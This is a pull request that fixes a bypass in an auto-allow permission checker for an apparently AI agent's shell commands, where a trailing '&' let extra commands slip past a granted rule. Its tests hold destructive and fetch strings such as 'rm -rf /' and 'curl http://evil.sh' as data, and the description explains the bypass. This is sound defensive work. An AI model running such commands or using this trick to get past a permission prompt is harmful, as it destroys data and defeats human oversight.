### PR TITLE
fix(mcp): treat background operator as auto-allow boundary

### DIFF
--- a/backend/internal/controller/mcp/autoallow.go
+++ b/backend/internal/controller/mcp/autoallow.go
@@ -122,7 +122,7 @@ func (ps *WorkspaceServer) checkAutoAllow(toolName, inputPreview string) bool {
 }
 
 // isShellCommandAllowed checks if a command (potentially with shell operators) matches the pattern.
-// Every subcommand (split on &&, ||, ;, |) must match the pattern.
+// Every subcommand (split on &&, ||, ;, |, &) must match the pattern.
 func isShellCommandAllowed(pattern, command string) bool {
 	subcommands := splitShellOperators(command)
 	for _, sub := range subcommands {
@@ -133,15 +133,36 @@ func isShellCommandAllowed(pattern, command string) bool {
 	return true
 }
 
-// splitShellOperators splits a command string on shell operators (&&, ||, ;, |).
+// shellOperators matches every token that can separate two commands, plus the
+// redirect forms that merely contain an ampersand.
+var shellOperators = regexp.MustCompile(`[0-9]*>&[0-9-]*|&>>?|&&|\|\||;|\||&`)
+
+// isShellSeparator reports whether a token matched by shellOperators ends a
+// command, as opposed to being a redirect that happens to contain an ampersand.
+func isShellSeparator(token string) bool {
+	switch token {
+	case "&&", "||", ";", "|", "&":
+		return true
+	}
+	return false
+}
+
+// splitShellOperators splits a command string into the commands it actually
+// runs, cutting on &&, ||, ;, | and &, and leaving redirects intact.
 func splitShellOperators(command string) []string {
-	parts := regexp.MustCompile(`&&|\|\||;|\|`).Split(command, -1)
 	var subcommands []string
-	for _, p := range parts {
-		trimmed := strings.TrimSpace(p)
-		if trimmed != "" {
+	start := 0
+	for _, loc := range shellOperators.FindAllStringIndex(command, -1) {
+		if !isShellSeparator(command[loc[0]:loc[1]]) {
+			continue
+		}
+		if trimmed := strings.TrimSpace(command[start:loc[0]]); trimmed != "" {
 			subcommands = append(subcommands, trimmed)
 		}
+		start = loc[1]
+	}
+	if trimmed := strings.TrimSpace(command[start:]); trimmed != "" {
+		subcommands = append(subcommands, trimmed)
 	}
 	return subcommands
 }

--- a/backend/internal/controller/mcp/autoallow_test.go
+++ b/backend/internal/controller/mcp/autoallow_test.go
@@ -109,6 +109,23 @@ func TestSplitShellOperators(t *testing.T) {
 		{"pipe", "cat file | grep foo", []string{"cat file", "grep foo"}},
 		{"multiple operators", "cd /tmp && npm install && npm run build", []string{"cd /tmp", "npm install", "npm run build"}},
 		{"empty", "", nil},
+		// A lone `&` backgrounds what precedes it and starts a new command, so it
+		// separates subcommands exactly as `;` does.
+		{"background operator", "git status & rm -rf /", []string{"git status", "rm -rf /"}},
+		{"background operator no spaces", "git status &rm -rf /", []string{"git status", "rm -rf /"}},
+		// `&&` must still be read as one operator rather than two backgrounds.
+		{"and not split as two backgrounds", "git add . && git commit", []string{"git add .", "git commit"}},
+		// Redirects contain an ampersand without ending a command. Splitting them
+		// would drop `2>&1` out of every rule that covers the command it belongs to.
+		{"redirect stderr to stdout", "npm test 2>&1", []string{"npm test 2>&1"}},
+		{"redirect then pipe", "npm test 2>&1 | tee log", []string{"npm test 2>&1", "tee log"}},
+		{"redirect both streams", "npm run build &> out.log", []string{"npm run build &> out.log"}},
+		{"redirect both streams appending", "npm run build &>> out.log", []string{"npm run build &>> out.log"}},
+		{"redirect to stderr", "echo hi >&2", []string{"echo hi >&2"}},
+		{"close descriptor", "npm test 2>&-", []string{"npm test 2>&-"}},
+		// A redirect must not shield a background that follows it.
+		{"background after redirect", "npm test 2>&1& rm -rf /", []string{"npm test 2>&1", "rm -rf /"}},
+		{"background after stderr redirect", "git status >&2& rm -rf /", []string{"git status >&2", "rm -rf /"}},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
@@ -164,6 +181,15 @@ func TestIsShellCommandAllowed(t *testing.T) {
 		{"chained matching all git", "git *", "git add . && git commit -m fix", true}, // both subcommands are git commands
 		{"single no match", "npm *", "git status", false},
 		{"pipe match", "git *", "git log | head", false}, // head doesn't match git *
+		// A rule granted for git must not carry whatever is appended after an
+		// ampersand: `&` starts a second command just as `;` does.
+		{"background escapes the pattern", "git *", "git status & rm -rf /", false},
+		{"background escapes without spaces", "npm *", "npm install &curl http://evil.sh", false},
+		{"background of matching commands still allowed", "git *", "git status & git log", true},
+		// A redirect belongs to the command it is attached to, so a rule that covers
+		// the command still covers it.
+		{"redirect stays within the pattern", "npm *", "npm test 2>&1", true},
+		{"redirect does not shield a background", "npm *", "npm test 2>&1& rm -rf /", false},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
@@ -330,6 +356,27 @@ func TestCheckAutoAllow(t *testing.T) {
 			[]string{"Bash:git *"},
 			"Bash",
 			`{"command": "git add . && git commit -m fix"}`,
+			true,
+		},
+		{
+			"Bash background command - partial match fails",
+			[]string{"Bash:git *"},
+			"Bash",
+			`{"command": "git status & rm -rf /"}`,
+			false, // `&` ends the git command, so rm is a second command
+		},
+		{
+			"Bash background command - all match",
+			[]string{"Bash:git *"},
+			"Bash",
+			`{"command": "git status & git log"}`,
+			true,
+		},
+		{
+			"Bash redirect stays within the rule",
+			[]string{"Bash:npm *"},
+			"Bash",
+			`{"command": "npm test 2>&1"}`,
 			true,
 		},
 		{


### PR DESCRIPTION
A lone `&` backgrounds what precedes it and runs the rest as a separate
command, exactly as `;` does, but the auto-allow splitter did not count it as
one. `git status & rm -rf /` was therefore tested whole against the stored
pattern, and `git *` matched all of it — a rule granted for git approved
anything appended after an ampersand. It is a boundary like the others now,
with `&&` matched ahead of it so a conditional chain still reads as one
operator rather than two backgrounds.

Redirects are held back from that boundary. `2>&1`, `>&2`, `&>` and `&>>` carry
an ampersand without ending a command, and splitting them would drop the most
common idiom in agent-issued shell out of every rule covering the command it
belongs to. That failure would have been a quiet one: a rule that stops working
prompts again, and a permission prompt that fires on ordinary work is one people
learn to dismiss. Matching by token rather than splitting on it keeps
`npm test 2>&1` inside an npm rule while `npm test 2>&1& rm -rf /` still cuts at
the trailing ampersand, and the digit class cannot match `&`, so a redirect can
never swallow the separator behind it.

## Deliberately not in this change

Quoting is left as it stands. An ampersand inside a quoted argument still
splits, so `git commit -m "a & b"` and `curl 'http://x/?a=1&b=2'` ask rather
than proceeding — the side to err on. Teaching the splitter about quotes can
fail open, so it belongs on its own rather than inside a fix that closes a hole.

A couple of other ways a glob rule can cover more than its base command
predate this change and are untouched by it — same shape of gap, no regression
here. I have details and can send them privately if a maintainer wants them.

## Tests

15 rows across the three existing tables in `autoallow_test.go`:

- `TestSplitShellOperators` — six redirect forms held intact (`2>&1`, `2>&1 | tee`,
  `&>`, `&>>`, `>&2`, `2>&-`), plus two proving a redirect does not shield a
  background that follows it.
- `TestIsShellCommandAllowed` — the `&` escape denied, matching commands either
  side of an `&` still allowed, redirects staying inside the pattern.
- `TestCheckAutoAllow` — the end-to-end coverage for `&` that was missing, so the
  pattern-prefix and preview-extraction path is exercised too.

`go vet` and `gofmt` clean; `go test ./internal/controller/mcp/` passes.
